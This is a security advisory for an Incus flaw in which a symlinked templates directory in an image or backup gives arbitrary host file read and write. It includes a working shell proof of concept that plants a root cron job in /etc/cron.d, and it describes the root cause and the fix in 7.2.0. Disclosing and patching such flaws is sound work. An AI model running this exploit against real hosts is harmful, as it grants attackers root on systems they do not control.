CVE-2026-48752: Incus Arbitrary Host File Read and Write via templates/ Symlink
A malicious container image or instance backup can trick Incus into treating a symlink as its templates directory, letting an attacker read or overwrite any file on the host, including cron jobs that
The problem
Incus before 7.2.0 unpacks container images and restores instance backups without checking whether the top-level `templates` entry is a symlink.
For container images, `shared/archive/archive.go` blocks device nodes but does not reject a symlink at `templates/`. For instance backups, `driver_dir_volumes.go` calls `rsync.LocalCopy` with `-a` (archive mode) but omits `--safe-links`, so rsync faithfully copies the symlink across.
In both paths the attacker controls where Incus reads and writes template files on the host.
Proof of concept
#!/bin/sh
# --- malicious container image ---
set -eu
tmpdir=$(mktemp -d)
mkdir -p "${tmpdir}/img/rootfs"
# Point templates/ at an arbitrary host directory
ln -s /etc/cron.d "${tmpdir}/img/templates"
cat <<'EOF' >"${tmpdir}/img/metadata.yaml"
architecture: x86_64
creation_date: 1
properties:
description: PoC templates symlink host afrw
EOF
cd "${tmpdir}/img"
tar --owner=0 --group=0 -f- -c * > ../afrw.tar
# Import and initialise - no special privileges needed beyond Incus API access
incus image import ../afrw.tar --alias afrw
incus init afrw afrw-pwn
# Write: drop a cron job that runs as root
printf '* * * * * root sh -c "id>/pwned"\n' \
| incus config template create afrw-pwn poc-cron
# Read: list any file reachable under the symlink target
# incus config template show afrw-pwn <filename>The root cause (CWE-73) is that neither the tar extraction path nor the rsync copy validates whether the `templates` directory entry inside the archive is a real directory or a symlink to an attacker-chosen host path.
Because Incus later reads and writes template files relative to that path, every subsequent `incus config template` operation transparently operates on the symlink target on the host filesystem. The fix in 7.2.0 adds an explicit symlink check for the `templates` entry during tar extraction (rejecting it when the resolved path escapes the destination) and passes `--safe-links` to rsync for the backup restore path, causing rsync to skip unsafe symlinks instead of copying them.
The fix
Upgrade `github.com/lxc/incus/v7` to version 7.2.0 or later. The patch adds symlink validation in `shared/archive/archive.go` for the image unpack path and adds `--safe-links` to the rsync arguments in `internal/server/storage/drivers/driver_dir_volumes.go` for the backup restore path.
No configuration workaround exists for earlier versions; restrict Incus API access to trusted users only as a partial mitigation.